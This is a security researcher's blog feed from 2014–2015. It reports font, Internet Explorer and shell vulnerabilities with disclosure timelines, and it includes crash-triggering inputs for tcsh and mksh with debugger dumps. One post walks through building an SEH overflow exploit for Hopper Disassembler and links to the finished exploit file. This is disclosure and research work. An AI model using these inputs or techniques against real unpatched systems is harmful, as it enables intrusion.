tag:blogger.com,1999:blog-40149796278796542282024-03-14T15:11:42.404+01:00h0wl's blogpentester & vuln researcher writing about stuff...Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.comBlogger24125tag:blogger.com,1999:blog-4014979627879654228.post-91172635892696063262015-07-01T19:51:00.000+02:002015-07-01T19:51:18.598+02:00[CVE-2015-3679] Apple OS X morx nSubtables Memory Corruption Remote Code Execution and [CVE-2015-3680] DFont FOND Memory Corruption Remote Code ExecutionYesterday Apple has released a security update <a href="https://support.apple.com/en-us/HT204942" target="_blank">2015-005</a> which included fixes for two vulnerabilities related to font parsing in OS X that i have reported to the ZDI. See original advisories for <a href="http://www.zerodayinitiative.com/advisories/ZDI-15-287/" target="_blank">CVE-2015-3679</a> and <a href="http://www.zerodayinitiative.com/advisories/ZDI-15-284/" target="_blank">CVE-2015-3680</a>.<br />
<br />
<br />Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-67768119744165482832015-06-22T20:50:00.000+02:002016-02-10T22:32:18.935+01:00Browsing stackoverflow for interesting crashes - Microsoft Internet Explorer 11Here is a nice example why it is worth to browse <a href="http://stackoverflow.com/">stackoverflow.com</a> for crash reports. Recently i stumbled upon this post:<br />
<a href="http://stackoverflow.com/questions/28114732/internet-explorer-11-crashes-when-angulars-http-post-is-used-with-large-complex">http://stackoverflow.com/questions/28114732/internet-explorer-11-crashes-when-angulars-http-post-is-used-with-large-complex</a><br />
<br />
I checked it out and as for today (22 Jun 2015) it crashes the latest Internet Explorer 11. The crash log looks interesting:<br />
<script src="https://gist.github.com/h0wl/3069bf4fca8bce27851d.js"></script>
The proof of concept from the post is huge so i decided to downsize it a bit and here it is:<br />
<script src="https://gist.github.com/h0wl/26d597ebcfc26f8b2a54.js"></script>
Certainly more readable. As usual maybe someone will find it useful.<br />
<br />
From one of the comments in the stackoverflow discussion, we can see that Microsoft is already looking into it (23 Jan 2015).<br />
<br />
Update:<br />
<br />
The bug was patched in the July 2015 MS Bulletin (probably this one <a href="https://support.microsoft.com/en-us/kb/3075516" target="_blank">MS15-065 - CVE-2015-2419</a>)<br />
<br />
Update #2:<br />
<br />
Great in-depth analysis of the bug by the guys from Checkpoint: <a href="http://blog.checkpoint.com/2016/02/10/too-much-freedom-is-dangerous-understanding-ie-11-cve-2015-2419-exploitation/">http://blog.checkpoint.com/2016/02/10/too-much-freedom-is-dangerous-understanding-ie-11-cve-2015-2419-exploitation/</a>Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com1tag:blogger.com,1999:blog-4014979627879654228.post-6568810179364793422015-06-07T10:25:00.001+02:002015-06-07T10:25:51.743+02:00Microsoft Internet Explorer 11 Crash PoCA test case that looked interesting at first, but most likely it is only a null ptr. Anyway you can find the proof of concept below.<br />
<br />
<script src="https://gist.github.com/h0wl/9fc7c336691dbf2607f2.js"></script>
It was tested on Windows 7 and 8.1, doesnt crash on older versions of IE as the faulty code was introduced in IE11.<br />
<br />
<script src="https://gist.github.com/h0wl/6ef734172d75bead5f6f.js"></script>Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com4tag:blogger.com,1999:blog-4014979627879654228.post-79782052797873763692015-04-03T21:32:00.000+02:002015-04-20T17:55:28.476+02:00Crashing Shells<div class="tr_bq">
A quick post about two crashes i found in tcsh (default FreeBSD shell, however the BSD version does not segfault) and mksh (default shell on Android). As i'm not planning to research it further, i will just leave it here. Maybe someone will figure out if any of this can be exploited somehow.</div>
<br />
tcsh:<br />
1. Affected version<br />
tcsh 6.18.01 and maybe older. FreeBSD version handled it just fine.<br />
<br />
3. PoC<br />
<blockquote class="tr_bq">
<b><i>$ perl -e 'print "\$?:<span style="color: #cc0000;">\x80</span>"' | tcsh
</i></b></blockquote>
<br />
<blockquote class="tr_bq" style="white-space: pre-wrap; word-wrap: break-word;">
<b><i>Program received signal SIGSEGV, Segmentation fault.<br />0x080d827a in xputchar (c=8388738) at sh.print.c:156<br />156 if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {<br />(gdb) x/i $eip<br />=> 0x80d827a <xputchar>: movzwl (%eax,%ebx,2),%edx</xputchar></i></b></blockquote>
Where the last byte marked with red color can be anything > 0x79 to trigger the crash.<br />
<br />
Android shell / mksh:<br />
<br />
1. Affected version<br />
mksh-R50e and maybe older. Tested on latest source version and a Nexus with Android 5.0.1<br />
<br />
2. PoC<br />
<br />
<blockquote class="tr_bq">
<b><i>D:\Android\sdk\platform-tools>adb shell # run shell</i></b><br />
<b><i>shell@mako:/ $ cd sdcard # must be a dir that is not read-only</i></b><br />
<b><i>cd sdcard</i></b><br />
<b><i>shell@mako:/sdcard $ <span style="color: #cc0000;">4444444444444>4</span> # actual input that causes the crash</i></b><br />
<b><i>4444444444444>4</i></b></blockquote>
<blockquote class="tr_bq">
<br />
<b><i>D:\Android\sdk\platform-tools> # our shell died </i></b></blockquote>
<br />
<script src="https://gist.github.com/h0wl/153ed99d2caf1ab3542a.js"></script><br />
It seems to crash at exec.c:1415 in function iosetup()
if (e->savefd[iop->unit] == 0) {<br />
<br />
update:<br />
by manipulating the first part of the expression we can control EAX and EBP value:<br />
e.g.<br />
<blockquote>
<b><i>$ <span style="color: #cc0000;">10947955850</span>>1</i></b><b><i><br /></i></b><br />
<b><i>Program received signal SIGSEGV, Segmentation fault.</i></b><br />
<b><i>0x80009c92 in ?? ()</i></b><br />
<b><i>(gdb) i r</i></b><br />
<b><i>eax <span style="color: #cc0000;">0x8c8c8c8a</span> -1936946038</i></b><br />
<b><i>ecx 0x3 3</i></b><br />
<b><i>edx 0x0 0</i></b><br />
<b><i>ebx 0x8003be50 -2147238320</i></b><br />
<b><i>esp 0xbffff210 0xbffff210</i></b><br />
<b><i>ebp 0x991da068 0x991da068</i></b><br />
<b><i>esi 0x80044a54 -2147202476</i></b><br />
<b><i>edi 0x2 2</i></b><br />
<b><i>eip 0x80009c92 0x80009c92</i></b><br />
<b><i>eflags 0x10206 [ PF IF RF ]</i></b><br />
<b><i>cs 0x73 115</i></b><br />
<b><i>ss 0x7b 123</i></b><br />
<b><i>ds 0x7b 123</i></b><br />
<b><i>es 0x7b 123</i></b><br />
<b><i>fs 0x0 0</i></b><br />
<b><i>gs 0x33 51</i></b></blockquote>
<blockquote class="tr_bq">
<b><i>$ <span style="color: #cc0000;">1000200887800</span>>1<br />Program received signal SIGSEGV, Segmentation fault.<br />0x80009c92 in ?? ()<br />(gdb) i r<br />eax 0xe09e5df8 -526492168<br />ecx 0x3 3<br />edx 0x0 0<br />ebx 0x8003be50 -2147238320<br />esp 0xbffff210 0xbffff210<br />ebp <span style="color: #cc0000;">0x41414344</span> 0x41414344<br />esi 0x80044a54 -2147202476<br />edi 0x2 2<br />eip 0x80009c92 0x80009c92<br />eflags 0x10206 [ PF IF RF ]<br />cs 0x73 115<br />ss 0x7b 123<br />ds 0x7b 123<br />es 0x7b 123<br />fs 0x0 0<br />gs 0x33 51<br />(gdb) bt<br />#0 0x80009c92 in ?? ()<br />Backtrace stopped: Cannot access memory at address <span style="color: #cc0000;">0x41414348</span></i></b></blockquote>
The bug has been patched in the latest R-50f release.<br />
Bug report can be seen <a href="https://bugs.launchpad.net/mksh/+bug/1440685" target="_blank">here</a> and the fix <a href="https://github.com/MirBSD/mksh/commit/e1cda74d044c0a2607a3686ce5f9924e6a6c0811" target="_blank">here</a>.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-27236408037914063212015-02-10T23:25:00.001+01:002015-02-10T23:28:10.010+01:00Microsoft Internet Explorer CShadow Direction Integer Overflow Remote Code Execution CVE-2015-0036 (MS15-009)In this months bulletin Microsoft has fixed multiple vulnerabilities in Internet Explorer including one which was mine. It was an integer overflow in the CShadow filter which could lead to remote code execution. It affected Internet Explorer 10 and 11. You can find the original ZDI advisory <a href="http://www.zerodayinitiative.com/advisories/ZDI-15-019/">here</a> and the Microsoft Bulletin <a href="https://technet.microsoft.com/library/security/dn903755.aspx" target="_blank">here</a>.<br />
<br />
There is some confusion when it comes to CVE assignment, as Microsoft acknowledged me for CVE-2015-0035 (also credited to Sky) while ZDI marked my bug CVE-2015-0036 which is credited to an anonymous researcher on the bulletin page. I will update this post if something changes regarding to that.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-16568631897799155172014-11-24T18:08:00.004+01:002014-12-01T11:06:10.307+01:00Hopper Disassembler 2.8.7 / 3.6.2 Mach-O Handling Buffer OverflowInspired by <a href="https://twitter.com/j00ru" target="_blank">@j00ru</a> <a href="http://j00ru.vexillium.org/?p=2454" target="_blank">talk</a> @ SECURE 2014 i decided to do a quick check of <a href="http://hopperapp.com/" target="_blank">Hopper Disassembler</a> (which is a great tool btw, I highly recommend it).<br />
<br />
As a sample i simply used one of the system tools from OS X (/bin/ls) and started fuzzing. I quickly began recording tons of crashes.The most interesting one was this:<br />
<script src="https://gist.github.com/h0wl/8f0f3ca45de15a452678.js"></script><br />
<br />
And file diff showed something like that:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0S2g60maHjw2CsVnrpdHsjSHme77djJf1C2pTAW2vQISHAOEKyP0FlHwKXBpj2j2FZhyA6jLqaCKTmuKRhn4Ag3vGgvsc_gOFs3EkL1je3sxlUO8TinpMeqgMDaxFad_xHeB2JizU1g/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0S2g60maHjw2CsVnrpdHsjSHme77djJf1C2pTAW2vQISHAOEKyP0FlHwKXBpj2j2FZhyA6jLqaCKTmuKRhn4Ag3vGgvsc_gOFs3EkL1je3sxlUO8TinpMeqgMDaxFad_xHeB2JizU1g/s1600/diff.png" height="249" width="320" /></a></div>
Its pretty straightforward right ? I checked the modules, and a standard SEH exploit should work for us:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKUUw20s2x7haJyGmDNqx6djYA7lSK0qvwiHl6NC5_Ux250hCvtYic1x9gds5bIAX0jZQlLp05tHwBKiFNlcZnfgJEE8hpiV-ZUCr8b8GagaKIaNiYWoSQSwkZACcN63ysPW4suKSHIw/s1600/nosafesehaslr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKUUw20s2x7haJyGmDNqx6djYA7lSK0qvwiHl6NC5_Ux250hCvtYic1x9gds5bIAX0jZQlLp05tHwBKiFNlcZnfgJEE8hpiV-ZUCr8b8GagaKIaNiYWoSQSwkZACcN63ysPW4suKSHIw/s1600/nosafesehaslr.png" height="100" width="320" /></a></div>
I calculated the offsets:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicPrb3tFZQqH7yjSxjQD0W5PvUk2oSHdj8aPyxKkT2Z2QYGvs8D9AR3iZXRgVTvDYg66gjrT5xJsrRUeciy-vZYutE3c3rjOkwGVfmfhcNnhPr3iio_fVkKEPRpt8At_nI7I6Jiz3vD2M/s1600/seh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicPrb3tFZQqH7yjSxjQD0W5PvUk2oSHdj8aPyxKkT2Z2QYGvs8D9AR3iZXRgVTvDYg66gjrT5xJsrRUeciy-vZYutE3c3rjOkwGVfmfhcNnhPr3iio_fVkKEPRpt8At_nI7I6Jiz3vD2M/s1600/seh.png" /></a></div>
By now i thought it's over, but first problems started to show when i wanted to substitute my A's and B's with pointers and other non printable characters (e.g. NOPs or INT 3) - Hopper would not crash at all.<br />
Instead of NOPs i could use \x40\x48 which is inc eax, dec eax.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPxKt5VlMr3vKNFoOvY23WZcXguSF9QqCknUKHcZ6KpesVTpWzGz3l1Mv92G8gM5ny2vK2QpvytNM9Q0olwIUPm38wIMfUXyZ8EAP_0CFIazX1voCrL9B8sh7KMi8n5L5vgt_mDZHhRcs/s1600/nop_alt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPxKt5VlMr3vKNFoOvY23WZcXguSF9QqCknUKHcZ6KpesVTpWzGz3l1Mv92G8gM5ny2vK2QpvytNM9Q0olwIUPm38wIMfUXyZ8EAP_0CFIazX1voCrL9B8sh7KMi8n5L5vgt_mDZHhRcs/s1600/nop_alt.png" /></a></div>
<br />
<br />
Regarding SEH overwrite i couldn't use short jump so i had to find a pointer that would later assemble to a instruction that wouldn't crash. Fortunately libpng had a nice ascii printable pointer which i could use for pop pop ret.<br />
<script src="https://gist.github.com/h0wl/52ce46ef1402341660c5.js"></script><br />
<br />
Next there was a problem with ascii only shellcode. I needed one of the register to point to it, but in case of SEH registers are XOR'ed. I found a solution <a href="https://www.mattandreko.com/2013/04/06/buffer-overflow-in-hexchat-294/" target="_blank">here</a>. Basically by using multiple POPAD instructions we can get ESP point to our buffer and then return to it.<br />
<br />
Now we can just generate our shellcode and place it in the controlled area:<br />
<script src="https://gist.github.com/h0wl/431098c1102112d34f83.js"></script><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2m8eLPAGhochADqu9vyvEZNAC-KA-xkudvx8odgc9jkcAtFl6HQptVflI6svABdEtl2Q27K3eNuqs-C7AcKL45W_aLWGlRXmhvN54lg-oeYI6sRZuwTaetyNEIgwievYJIaUWEbXMKdk/s1600/popad2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2m8eLPAGhochADqu9vyvEZNAC-KA-xkudvx8odgc9jkcAtFl6HQptVflI6svABdEtl2Q27K3eNuqs-C7AcKL45W_aLWGlRXmhvN54lg-oeYI6sRZuwTaetyNEIgwievYJIaUWEbXMKdk/s320/popad2.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
When we let it run we get:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfReDbICAoPS9yfhogWz8B2TaLQBKfu5cgpxUyTUeVuRUVyuFxwXz0HLtwV1cwhth6qL-cNzJjcPAZ0og-JWMj4e1mWkyQjWytohhbcfECo9pVWmuBpex1ZOhvRtMXdGBD8ZhaOJOB4k/s1600/calc_exe2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfReDbICAoPS9yfhogWz8B2TaLQBKfu5cgpxUyTUeVuRUVyuFxwXz0HLtwV1cwhth6qL-cNzJjcPAZ0og-JWMj4e1mWkyQjWytohhbcfECo9pVWmuBpex1ZOhvRtMXdGBD8ZhaOJOB4k/s1600/calc_exe2.png" height="241" width="320" /></a></div>
Short demo:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/SO2ySmH4j2w?feature=player_embedded' frameborder='0'></iframe></div>
<br />
The final result can be downloaded here: <a href="http://howl.overflow.pl/run_calc" target="_blank">Hopper run calc</a> <br />
<br />
Vulnerable versions:<br />
Hopper 2.8.7 and probably older versions (tested on Windows)<br />
Hopper 3.6.2 and probably older versions (tested on Mac OS X)<br />
Linux version was not tested.<br />
<br />
Timeline: <br />
17 Nov 2014 - issue reported to the vendor<br />
18 Nov 2014 - vendor releases a fix for Mac OS X (3.6.3 version)<br />
24 Nov 2014 - publication of this article<br />
Windows version remains unpatched as its development is currently on hold.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
<br />
<br />Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-72532605939167713022014-07-22T19:06:00.000+02:002014-07-22T19:06:17.886+02:00SyScan360 2014 - Mobile Browsers Security: iOSLast week together with Lukasz Pilorz I was speaking about mobile browsers security on iOS @ SyScan360 in Beijing. Visiting China for the first time was a great experience, and the conference itself was just awesome. Cool people, very technical talks and good organization is what it makes this event exceptional.<br />
<br />
Our slides are already available for download from the conference site <a href="http://www.syscan360.org/slides/2014_EN_MobileBrowsersSecurityiOS_LukaszPilorzPawelWylecial.pdf" target="_blank">here</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRu-2PM7_EiJW4eBQuKBbEab1rXDtQrxwIKHgd5XJKRvdtlPxv5gWJoXKYfyGZZIVnyQhTK2xDCC-_oTkX43UwdqVGxZbAZEUkw1cEVIU-ioJm5KfDWhZLl_3ZQdEvdsTx2_7j4-tpuEo/s1600/syscan2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRu-2PM7_EiJW4eBQuKBbEab1rXDtQrxwIKHgd5XJKRvdtlPxv5gWJoXKYfyGZZIVnyQhTK2xDCC-_oTkX43UwdqVGxZbAZEUkw1cEVIU-ioJm5KfDWhZLl_3ZQdEvdsTx2_7j4-tpuEo/s1600/syscan2.jpg" height="320" width="240" /></a></div>
<br />Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-26581081513432316252014-06-22T01:22:00.002+02:002014-06-22T01:32:51.411+02:00Microsoft Internet Explorer 11 (11.0.9600.17107) MSHTML!CStr::_Free CrashAnother crash in IE11, maybe someone will find it interesting. It occurs when calling the Developer Tools (F12). After i finished minimizing the test case it turned out to be just one line:<br />
<script src="https://gist.github.com/h0wl/967d5f7d00e6133a0339.js"></script><br />
<br />
To reproduce the crash it is required to:<br />
1. enable pageheap<br />
2. open the html file<br />
3. press F12/open Developer Tools<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBMxW7fCJvWY0HMBvEExwIwEBOYmHxzD7n-aJHeOigMS7Bd1kyQ-o89dqT7FmMex5Ms3jloOm-nuLizDODsWJ1pURhiwCWQGXS2uBnb1qnxNzV_1W3SRRqeBRhWgPTcQrv_Oc2gwjClqA/s1600/div_f12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBMxW7fCJvWY0HMBvEExwIwEBOYmHxzD7n-aJHeOigMS7Bd1kyQ-o89dqT7FmMex5Ms3jloOm-nuLizDODsWJ1pURhiwCWQGXS2uBnb1qnxNzV_1W3SRRqeBRhWgPTcQrv_Oc2gwjClqA/s1600/div_f12.png" height="184" width="320" /></a></div>
Also you need the exact build version as in the title (or lower) because this issue was fixed in the last Microsoft Security Bulletin (https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx). I have not really investigated that crash, because i found it the day before patch tuesday, and when it got fixed i moved on.<br />
<br />
(b5c.5fc): Access violation - code c0000005 (!!! second chance !!!)<br />
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - <br />
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll - <br />
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8<br />
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0 nv up ei pl zr na pe nc<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<br />
MSHTML+0x4f36a:<br />
6bc0f36a 8b06 mov eax,dword ptr [esi] ds:0023:07d30fdc=00000001<br />
0:005> .symfix<br />
0:005> .reload<br />
Reloading current modules<br />
................................................................<br />
...............<br />
0:005> r<br />
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8<br />
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0 nv up ei pl zr na pe nc<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<br />
MSHTML!CStr::_Free+0x5:<br />
6bc0f36a 8b06 mov eax,dword ptr [esi] ds:0023:07d30fdc=00000001<br />
0:005> k<br />
ChildEBP RetAddr <br />
048b93a0 6c222df4 MSHTML!CStr::_Free+0x5<br />
048b93bc 6c50fb52 MSHTML!CListenerDispatch::ConstructCode+0x78<br />
048b9494 6c365616 MSHTML!CDoc::DynamicAttachDebugger+0x350<br />
048ba078 6bd42176 MSHTML!CDoc::ExecHelper+0x623721<br />
048ba098 6eeb93dd MSHTML!CDoc::Exec+0x21<br />
048ba0e8 6eeb9097 DiagnosticsTap!DebugThreadController::IOleCommandTargetExec+0xb9<br />
048ba11c 6eeb8ef0 DiagnosticsTap!DebugThreadController::EnableSourceRundown+0x4e<br />
048ba134 6eec4294 DiagnosticsTap!DebugThreadController::Initialize+0x81<br />
048ba154 6b5479f1 DiagnosticsTap!TapObject::CreateDebuggerController+0x9f<br />
048ba1d0 6b5474a2 F12Tools!BHOSite::LaunchOutOfProcHost+0x205<br />
048ba454 6b546bdc F12Tools!BHOSite::InitializeWindowsAndThreads+0x3bc<br />
048ba480 75e07051 F12Tools!BHOSite::SetSite+0xb0<br />
048ba498 66d226e8 shcore!IUnknown_SetSite+0x2c<br />
048ba4cc 66f424ab IEFRAME!CBandSite::_AddBandByID+0xe5<br />
048ba508 66f2a446 IEFRAME!CBandSite::AddBandWithCLSID+0x3b<br />
048ba550 66f296e5 IEFRAME!CShellBrowser2::_GetInfoBandBS+0x177<br />
048ba5a4 66f2e01d IEFRAME!CShellBrowser2::_EnsureAndNavigateBand+0x8e<br />
048ba5c8 66ddf834 IEFRAME!CShellBrowser2::_ShowHideBrowserBar+0x60<br />
048ba5ec 66e6712d IEFRAME!CShellBrowser2::_SetBrowserBarState+0x1b9<br />
048ba878 66f2f2f0 IEFRAME!CShellBrowser2::Exec+0x23a758<br />
048bbb38 66e654e8 IEFRAME!CShellBrowser2::v_OnCommand+0xc72<br />
048bc390 66c3b164 IEFRAME!CBaseBrowser2::v_WndProc+0x228497<br />
048bc484 66c281f5 IEFRAME!CShellBrowser2::v_WndProc+0x1ae<br />
048bc4a8 779d75b3 IEFRAME!CShellBrowser2::s_WndProc+0x58<br />
048bc4d4 779d77b8 user32!_InternalCallWinProc+0x23<br />
048bc554 779d9744 user32!UserCallWinProcCheckWow+0x110<br />
048bc5b0 779d9894 user32!DispatchClientMessage+0xb5<br />
048bc5d8 77b92cde user32!__fnDWORD+0x2c<br />
048bc608 779ed2a1 ntdll!KiUserCallbackDispatcher+0x2e<br />
048bc60c 66d093e6 user32!NtUserTranslateAccelerator+0xa<br />
048bc62c 66d09383 IEFRAME!CShellBrowser2::TranslateAcceleratorSB+0x34<br />
048bc654 66d09214 IEFRAME!CShellBrowser2::_MayTranslateAccelerator_CCommonBrowser+0xb7<br />
048bc680 66cf6d9f IEFRAME!CShellBrowser2::_MayTranslateAccelerator+0x3b<br />
048bf840 66c8358f IEFRAME!CTabWindow::_TabWindowThreadProc+0x587<br />
048bf8f8 71ec1b7c IEFRAME!LCIETab_ThreadProc+0x31c<br />
048bf908 6eb531cc iertutil!_IsoThreadProc_WrapperToReleaseScope+0xe<br />
048bf934 762b17ad IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x71<br />
048bf940 77b73af4 KERNEL32!BaseThreadInitThunk+0xe<br />
048bf984 77b73acd ntdll!__RtlUserThreadStart+0x20<br />
048bf994 00000000 ntdll!_RtlUserThreadStart+0x1bPawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-77562763362578755092014-05-29T21:35:00.000+02:002014-05-31T16:07:05.817+02:00Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-ZeroRecently i was playing wit the WeakMap implementation in IE11. The following code caused the browser crash:<br />
<script src="https://gist.github.com/h0wl/648fb10ba1bf023124ae.js"></script>
<br />
<br />
<blockquote class="tr_bq">
(1c58.20c0): <b>Integer divide-by-zero</b> - code c0000094 (!!! second chance !!!)<br />
eax=00aee241 ebx=059f8cc0 ecx=059f8cc8 edx=00000000 esi=059f8cc8 edi=05171aa0<br />
eip=668756f0 esp=06a6bcbc ebp=06a6bccc iopl=0 nv up ei pl nz na pe nc<br />
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />
jscript9!JsUtil::WeaklyReferencedKeyDictionary<js::dynamicobject bool="" const="" ecyclerpointercomparer="" s::dynamicobject="">,1>::TryGetValueAndRemove+0x1f:<br />668756f0 f736 <b>div eax,dword ptr [esi] ds:002b:059f8cc8=00000000</b><br />0:020> k<br />ChildEBP RetAddr <br />06a6bccc 66874949 jscript9!JsUtil::WeaklyReferencedKeyDictionary<js::dynamicobject bool="" const="" ecyclerpointercomparer="" s::dynamicobject="">,1>::TryGetValueAndRemove+0x1f<br />06a6bcec 668a28ca jscript9!Js::JavascriptWeakMapData::Delete+0x2c<br />06a6bd10 66537530 jscript9!Js::JavascriptWeakMap::EntryDelete+0xc5<br />06a6c058 66537028 jscript9!Js::InterpreterStackFrame::Process+0x1e3c<br />06a6c174 06550fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8<br />WARNING: Frame IP not in any known module. Following frames may be wrong.<br />06a6c180 665319eb 0x6550fe9<br />06a6c1c0 66532032 jscript9!Js::JavascriptFunction::CallFunction<1>+0x88<br />06a6c22c 66531f84 jscript9!Js::JavascriptFunction::CallRootFunction+0x93<br />06a6c274 66531f0b jscript9!ScriptSite::CallRootFunction+0x42<br />06a6c298 66592bce jscript9!ScriptSite::Execute+0x6c<br />06a6c320 6660da36 jscript9!ScriptEngine::ExecutePendingScripts+0x1ab<br />06a6c3a8 6660eeb8 jscript9!ScriptEngine::ParseScriptTextCore+0x29c<br />06a6c3f8 56866ba5 jscript9!ScriptEngine::ParseScriptText+0x5a<br />06a6c430 56866ce1 MSHTML!CActiveScriptHolder::ParseScriptText+0x42<br />06a6c480 565ea155 MSHTML!CJScript9Holder::ParseScriptText+0x6d<br />06a6c4e8 56867fa3 MSHTML!CScriptCollection::ParseScriptText+0x155<br />06a6c5d4 56867bf3 MSHTML!CScriptData::CommitCode+0x2d0<br />06a6c64c 568679db MSHTML!CScriptData::Execute+0x1fe<br />06a6c660 5655ed1b MSHTML!CHtmScriptParseCtx::Execute+0x8b<br />06a6c6d8 56518d27 MSHTML!CHtmParseBase::Execute+0x135<br />06a6c7fc 565efece MSHTML!CHtmPost::Exec+0x474<br />06a6c814 565efe52 MSHTML!CHtmPost::Run+0x1c<br />06a6c834 565f11a2 MSHTML!PostManExecute+0x61<br />06a6c848 565f1103 MSHTML!PostManResume+0x7b<br />06a6c878 565e152f MSHTML!CHtmPost::OnDwnChanCallback+0x38<br />06a6c888 56499bb4 MSHTML!CDwnChan::OnMethodCall+0x19<br />06a6c8cc 56481c3a MSHTML!GlobalWndOnMethodCall+0x12c<br />06a6c918 74e562fa MSHTML!GlobalWndProc+0x115<br />06a6c944 74e56d3a user32!InternalCallWinProc+0x23<br />06a6c9bc 74e577c4 user32!UserCallWinProcCheckWow+0x109<br />06a6ca1c 74e5788a user32!DispatchMessageWorker+0x3bc<br />06a6ca2c 574dbe78 user32!DispatchMessageW+0xf<br />06a6fbec 5753358f IEFRAME!CTabWindow::_TabWindowThreadProc+0x445<br />06a6fca4 75f01b7c IEFRAME!LCIETab_ThreadProc+0x31c<br />06a6fcb4 695431cc iertutil!CIsoScope::_InitManagerEntanglementLock+0x53<br />06a6fce0 75cb338a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x71<br />06a6fcec 773e9f72 kernel32!BaseThreadInitThunk+0xe<br />06a6fd2c 773e9f45 ntdll!__RtlUserThreadStart+0x70<br />06a6fd44 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><js::dynamicobject bool="" const="" ecyclerpointercomparer="" s::dynamicobject=""><br /><js::dynamicobject bool="" const="" ecyclerpointercomparer="" s::dynamicobject=""><js::dynamicobject bool="" const="" ecyclerpointercomparer="" s::dynamicobject=""><br /><!--1--><!--1--></js::dynamicobject><!--1--><!--1--></js::dynamicobject><!--1--><!--1--></js::dynamicobject><!--1--><!--1--><!--1--><!--1--></1></1></js::dynamicobject></js::dynamicobject></blockquote>
It is caused by a division by zero, so the bug is not exploitable, only a simple DoS.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-18954394664101495792014-05-19T22:30:00.001+02:002014-05-19T22:30:56.655+02:00CVE-2014-3788 and MS14-028Zero Day Initiative (ZDI) has published another advisory for a heap buffer overflow
vulnerability in Cogent DataHub webserver that i found. The bug occured when passing a negative value in the Content-Length header. The original advisory can be read here <a href="http://zerodayinitiative.com/advisories/ZDI-14-135/" target="_blank">ZDI-14-135</a>.<br />
<br />
